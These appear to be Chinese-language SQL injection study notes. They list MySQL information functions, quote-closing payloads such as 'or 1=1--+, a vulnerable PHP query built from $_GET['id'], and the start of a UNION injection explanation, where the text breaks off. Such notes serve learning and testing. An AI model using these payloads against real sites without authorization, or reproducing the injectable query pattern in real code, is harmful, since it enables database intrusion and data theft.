system_user()--系统用户名 user()--用户名 current_user()--当前用户名 session_user()--链接数据库的用户名 database()--数据库名 version()--数据库版本 @@datadir--数据库路径 @@basedir--数据库安装路径 @@version_conpile_os--操作系统 concat(str1,str2,...)--没有分隔符地连接字符串 concat_ws(separator,str1,str2,...)--含有分隔符地连接字符串 group_concat(str1,str2,...)--连接一个组的所有字符串，并以逗号分隔每一条数据。 --+可以用#替换，url 提交过程中Url 编码后的#为%23 or 1=1--+ 'or 1=1--+ "or 1=1--+ )or 1=1--+ ')or 1=1--+ ") or 1=1--+ "))or 1=1--+ 一般的代码为： $id=$_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 此处考虑两个点，一个是闭合前面你的' 另一个是处理后面的' ，一般采用两种思路，闭合后面的引号或者注释掉，注释掉采用--+ 或者#（%23） 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表，从而实现将两个表的查询组合到一起，使用谓词为UNION或UNION ALL。将多个查询的结果合并到一起（纵向合并）：字段数不变，多个查询的记录数合并。 基本语法： Select 语句 Union